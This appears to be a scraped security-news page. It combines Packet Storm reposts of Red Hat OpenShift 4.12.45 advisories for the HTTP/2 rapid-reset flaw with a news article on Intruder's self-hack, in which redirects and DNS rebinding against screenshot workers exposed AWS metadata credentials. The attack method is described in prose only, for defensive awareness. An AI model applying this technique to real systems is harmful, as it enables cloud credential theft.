Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.45. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2023:7610

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://issues.redhat.com/browse/OCPBUGS-19064  
https://issues.redhat.com/browse/OCPBUGS-20185  
https://issues.redhat.com/browse/OCPBUGS-20413  
https://issues.redhat.com/browse/OCPBUGS-20417  
https://issues.redhat.com/browse/OCPBUGS-21596  
https://issues.redhat.com/browse/OCPBUGS-22949  
https://issues.redhat.com/browse/OCPBUGS-23154  
https://issues.redhat.com/browse/OCPBUGS-23182  
https://issues.redhat.com/browse/OCPBUGS-23222  
https://issues.redhat.com/browse/OCPBUGS-23274  
https://issues.redhat.com/browse/OCPBUGS-23293  
https://issues.redhat.com/browse/OCPBUGS-23329  
https://issues.redhat.com/browse/OCPBUGS-23346  
https://issues.redhat.com/browse/OCPBUGS-23415  
https://issues.redhat.com/browse/OCPBUGS-23419  
https://issues.redhat.com/browse/OCPBUGS-23439

Red Hat Security Advisory 2023-7608-03

Red Hat Security Advisory 2023-7607-03 - Red Hat OpenShift Container Platform release 4.12.45 is now available with updates to packages and images that fix several bugs.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7607.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.12.45 security and extras update  
Advisory ID:        RHSA-2023:7607-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7607  
Issue date:         2023-12-06  
Revision:           03  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.12.45 is now available with updates to packages and images that fix several bugs.

This release includes a security update for Red Hat OpenShift Container Platform 4.12.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.45. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2023:7608

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://issues.redhat.com/browse/OCPBUGS-22370

Red Hat Security Advisory 2023-7607-03

By Waqas
Self-Hack: Strengthen Your Security Before External Threats Strike!
This is a post from HackRead.com Read the original post: Cybersecurity Firm Hacks Itself, Finds DNS Flaw Leak AWS Credentials

Intruder.io, a London, England-based cybersecurity firm, conducted a self-hack using a DNS rebinding attack, enabling them to extract low-privileged AWS credentials.

Cybersecurity firm Intruder has published blog posts explaining how they got hacked by successfully exploiting a DNS rebinding vulnerability that allowed them to extract low-privileged AWS (Amazon Web Services) credentials. They discovered a DNS rebinding vulnerability in their platform after hacking themselves.

Although rare, DNS rebinding exploitation is a persistent threat. In 2018, Hackread.com **reported** cybersecurity firm Armis’ research, which revealed that over half a billion (496 million) IoT devices were found vulnerable to DNS rebinding, most used by enterprises.

Intruder’s penetration tester Daniel Thatcher **noted** that while the vulnerability’s impact was limited due to the prevailing security measures, the exploit indicates the feasibility of DNS rebinding attacks in time-constrained scenarios like penetration testing.

Further probing helped him **achieve** reliable split-second DNS rebinding in Chrome, Edge, and Safari browsers, which was surprising, specifically when IPv6 was available.

The vulnerability was discovered in Intruder’s screenshot workers, which capture snapshots of customer websites. Since these follow HTTP redirects before taking screenshots and lack restrictions on accessing the internal EC2 metadata service, it became possible to expose AWS credentials for available roles.

Leveraging this vulnerability, a public web server was set up to redirect to the EC2 metadata service endpoint. When a worker took a screenshot of this server, it captured the list of available roles, revealing sensitive information. Through further modification, Thatcher obtained actual credentials for a specific role.

Thatcher notified the **DevOps team** and tried to fix the issue by implementing network-level restrictions to prevent the “screenshotting tool from accessing the metadata service”, the blog read.

Daniel also switched workers to using **IMDSv2**, thinking this would prevent the attack by making it compulsory to include a token in a header in all requests to the metadata service by making a PUT request to a specific endpoint on the metadata service.

With HTTP redirects, such as those Intruder’s screenshot workers were following, it isn’t possible to set headers, make PUT requests or view their responses. That’s when it occurred to him that DNS rebinding could potentially enable them to bypass restrictions on major browsers and private network requests.

In browsers, traditional DNS rebinding allows attackers to access internal network services by tricking victims into loading a malicious website. However, given that modern web applications are driving headless browsers for their functionality, it’s become a useful tool for attacking web apps by returning both public (attacker-controlled) and target server IP addresses.

The attack relies on the browser first communicating with the public server and loading the attacker’s page. The attacker’s server then blocks traffic, forcing the browser to fall back to the target server, allowing JavaScript on the attacker’s page to send requests to the target server with the same origin.

The extracted credentials had minimal permissions and limited potential damage, but service disruption was possible. They could prevent further digging into AWS and possible harm by limiting access to other HTTP services.

Thatcher concluded that multiple security layers could minimise the attack surface even if the vulnerability was exploited. The screenshot worker vulnerability was patched with IMDSv2 implementation.

**Strengthen Your Security Before External Threats Strike**

Conducting ethical hacking or penetration testing, wherein you intentionally hack into your own network to identify security vulnerabilities, is a proactive and strategic approach to bolstering cybersecurity defences.

By simulating real-world attack scenarios, organizations can gain valuable insights into potential weaknesses that could be exploited by malicious actors. This self-imposed testing allows for the discovery of vulnerabilities **before they can be maliciously leveraged** by external threats.

Understanding these weaknesses enables organizations to implement strong security measures, apply necessary patches, and strengthen their defences, ultimately reducing the risk of unauthorized access, data breaches, or other cyber threats.

Simply put, hacking oneself provides an opportunity to address vulnerabilities beforehand, ensuring a more secure network environment before adversaries have a chance to exploit identified vulnerabilities.

****_RELATED ARTICLES_****

1.  **Cybersecurity firm exposes 5 billion data breach records**
2.  **Chinese Hackers Keep Targeting Group-IB Cybersecurity Firm**
3.  **WH National Cybersecurity Strategy: Software Firms Liable for Breaches**
4.  **Cybersecurity firm Stormshield breach; customer data, source code stolen**
5.  **LockBit 3.0 Posts Dubious Claims of Breaching Darktrace Cybersecurity Firm**

Tag

#web